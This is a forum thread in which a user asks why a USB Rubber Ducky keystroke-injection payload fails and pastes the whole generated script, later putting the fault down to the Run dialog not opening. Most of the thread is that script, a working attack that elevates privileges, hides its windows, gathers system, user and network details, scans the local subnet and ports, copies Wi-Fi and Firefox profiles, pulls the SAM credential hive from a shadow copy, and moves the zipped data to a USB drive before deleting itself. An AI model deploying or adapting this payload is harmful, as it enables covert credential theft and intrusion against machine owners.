Jump to content

How do I debug Rubber Ducky Scripts that don't act as expected?


Go to solution Solved by 0phoi5,

Recommended Posts

Posted (edited)

Hi all,

So I placed the following scipt on my Rubber Ducky, as inject.bin (next post).

I used the Payload Generator located here. I chose all Recon apart from Screen Capture, and Reporting as 'Save Files to USB' Drive.

I plugged it in to a Windows 7 machine, with the machine being on the Desktop and not locked.

It proceeded to do nothing for a while, then it opened a random image file I happened to have on my Desktop and zoomed in and out on it a few times. Then silence.

I plugged in my USB, named 'HELLOWORLD', gave it a few minutes and then unplugged.

The USB had nothing on it, which wasn't right. It failed to gather any information at all.

Is there a way I can debug the script? As in, get it to tell me exactly what it's doing, as it does it, on-screen?

Or maybe you have an idea of what went wrong?

*NOTE*

This bit at the start...

STRING powershell Start-Process notepad -Verb runAs

... didn't open notepad. Notepad failed to open at any point.

Cheers.

Edited by haze1434
Posted


DELAY 1200

GUI r

DELAY 1200

STRING powershell Start-Process notepad -Verb runAs

ENTER

DELAY 1200

ALT y

DELAY 1200

ENTER

ALT SPACE

DELAY 1200

STRING m

DELAY 1200

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

ENTER

STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')

ENTER

STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime

ENTER

STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory

ENTER

STRING $date = get-date

ENTER

STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"

ENTER

STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'

ENTER

STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"

ENTER

STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem

ENTER

STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime

ENTER

STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)

ENTER

STRING $SerialNo = $SysSerialNo.SerialNumber

ENTER

STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model

ENTER

STRING $SysManufacturer = $SysInfo.Manufacturer

ENTER

STRING $SysModel = $SysInfo.Model

ENTER

STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption

ENTER

STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"

ENTER

STRING $HD = [math]::truncate($disk.Size / 1GB)

ENTER

STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)

ENTER

STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize

ENTER

STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)

ENTER

STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name

ENTER

STRING $Cpu = $SysCpu.Name

ENTER

STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber

ENTER

STRING $HardSerialNo = $HardSerial.SerialNumber

ENTER

STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name

ENTER

STRING $graphicsCard = gwmi win32_VideoController |select Name

ENTER

STRING $graphics = $graphicsCard.Name

ENTER

STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1

ENTER

STRING $DriveLetter = $CDDrive.Drive

ENTER

STRING $DriveName = $CDDrive.Caption

ENTER

STRING $Disk = $DriveLetter + '' + $DriveName

ENTER

STRING $Firewall = New-Object -com HNetCfg.FwMgr

ENTER

STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile

ENTER

STRING $FireProfile = $FireProfile.FirewallEnabled

ENTER

STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"

ENTER

STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired

ENTER

STRING $UserType = $UserInfo.AccountType

ENTER

STRING $UserSid = $UserInfo.SID

ENTER

STRING $UserPass = $UserInfo.PasswordRequired

ENTER

STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')

ENTER

STRING $Report = $Report +"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"

ENTER

STRING $Report = $Report + '</div>'

ENTER

STRING $u = 0

ENTER

STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)

ENTER

STRING $Report = $Report + '<div id=right><h3>USB Devices</h3><table>'

ENTER

STRING do {

ENTER

STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)

ENTER

STRING $Report = $Report + "<tr><td>Drive Name: </td><td> + " $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>STRING Write-Output $fullUSB"

ENTER

STRING $u ++

ENTER

STRING } while ($u -lt $allUsb.Count)

ENTER

STRING $Report = $Report + '</table></div>'

ENTER

STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'

ENTER

STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)

ENTER

STRING $Report = $Report + '</div>'

ENTER

STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> '

ENTER

STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)

ENTER

STRING $Report = $Report + '</table></div>'

ENTER

STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>'

ENTER

STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy)

ENTER

STRING $Report = $Report + '</div>'

ENTER

STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'

ENTER

STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)

ENTER

STRING $Report = $Report + '</div>'

ENTER

STRING $Report = $Report + '<div id=center><h3>Network Information</h3>'

ENTER

STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)

ENTER

STRING $Report = $Report + '</table></div>'

ENTER

STRING $IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1

ENTER

STRING $IPAddr = $IP.IPAddress | Select-Object -Index 0

ENTER

STRING $IPAddr -as [String]

ENTER

STRING $IPa = $IPAddr.Split('.') | Select -Index 0

ENTER

STRING $IPb = $IPAddr.Split('.') | Select -Index 1

ENTER

STRING $IPc = $IPAddr.Split('.') | Select -Index 2

ENTER

STRING $IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.'

ENTER

STRING $Ping = new-object System.Net.Networkinformation.Ping

ENTER

STRING $ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address

ENTER

STRING $x = 0

ENTER

STRING $Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>'

ENTER

STRING do {

ENTER

STRING $IPResults = $ScanResults | Select-Object -Index $x

ENTER

STRING $CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory

ENTER

STRING $CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname

ENTER

STRING $CurrIP = $IPResults.Address.IPAddressToString

ENTER

STRING $CurrOS = $CompInfo.SystemDirectory

ENTER

STRING $CurrName = $CompInfo.RegisteredUser

ENTER

STRING if ($CompInfo -ne $null){

ENTER

STRING $Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>'

ENTER

STRING }else{

ENTER

STRING $Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'}

ENTER

STRING $x ++

ENTER

STRING } while ($x -lt $ScanResults.Count)

ENTER

STRING $Report = $Report + '</table></div>'

ENTER

STRING $Computer = $env:COMPUTERNAME

ENTER

STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080

ENTER

STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'

ENTER

STRING foreach ($PortNumber in $PortList) {

ENTER

STRING $PortCheck = New-Object Net.Sockets.TcpClient

ENTER

STRING $PortCheck.Connect($Computer, $PortNumber)

ENTER

STRING if ($PortCheck.Connected) {

ENTER

STRING $Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}

ENTER

STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}

ENTER

STRING $Report = $Report + '</table></div>'

ENTER

STRING $wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory

ENTER

STRING $srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces'

ENTER

STRING Copy-Item $srcDir $wlanSaveDir -Recurse

ENTER

STRING $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory

ENTER

STRING $fireDir = $userDir + '\AppData\Roaming\Mozilla\Firefox\Profiles'

ENTER

STRING $getFire = Get-Item -Path $fireDir -Exclude extensions

ENTER

STRING Copy-Item $getFire $fireSaveDir -Recurse

ENTER

STRING Start-Sleep -s 10

ENTER

STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')

ENTER

STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }

ENTER

STRING $addSlash = $shadow.DeviceObject + ''

ENTER

STRING cmd /c mklink C:\shadowcopy $addSlash

ENTER

STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir

ENTER

STRING Remove-Item -recurse -force 'C:\shadowcopy'

ENTER

STRING $Report >> $fileSaveDir'/ComputerInfo.html'

ENTER

STRING function copy-ToZip($fileSaveDir){

ENTER

STRING $srcdir = $fileSaveDir

ENTER

STRING $zipFile = 'C:\Windows\Report.zip'

ENTER

STRING if(-not (test-path($zipFile))) {

ENTER

STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))

ENTER

STRING (dir $zipFile).IsReadOnly = $false}

ENTER

STRING $shellApplication = new-object -com shell.application

ENTER

STRING $zipPackage = $shellApplication.NameSpace($zipFile)

ENTER

STRING $files = Get-ChildItem -Path $srcdir

ENTER

STRING foreach($file in $files) {

ENTER

STRING $zipPackage.CopyHere($file.FullName)

ENTER

STRING while($zipPackage.Items().Item($file.name) -eq $null){

ENTER

STRING Start-sleep -seconds 1 }}}

ENTER

STRING copy-ToZip($fileSaveDir)

ENTER

STRING $usbPresent = 'False'

ENTER

STRING do {

ENTER

STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | Measure

ENTER

STRING if ($present.Count -ge 1){

ENTER

STRING $usbPresent = 'True' }Else {

ENTER

STRING $usbPresent = 'False'}}

ENTER

STRING until ($usbPresent -eq 'True')

ENTER

STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | select Name

ENTER

STRING move-item c:\Windows\Report.zip $driveLetter.Name

ENTER

STRING remove-item $fileSaveDir -recurse

ENTER

STRING Remove-Item $MyINvocation.InvocationName

ENTER

CTRL S

DELAY 1200

STRING C:\Windows\config-d6899.ps1

ENTER

DELAY 1200

ALT F4

DELAY 1200

GUI r

DELAY 1200

STRING powershell Start-Process cmd -Verb runAs

ENTER

DELAY 1200

ALT y

DELAY 1200

STRING mode con:cols=14 lines=1

ENTER

ALT SPACE

DELAY 1200

STRING m

DELAY 1200

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

DOWNARROW

ENTER

STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

ENTER

DELAY 1200

STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1

ENTER

  • 2 weeks later...
  • Solution
Posted (edited)

Ignore me, I was being a tit. Must have needed coffee on this day.

GUI r didn't open RUN, which in turn meant notepad didn't load. Pretty simple really.

Edited by haze1434

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...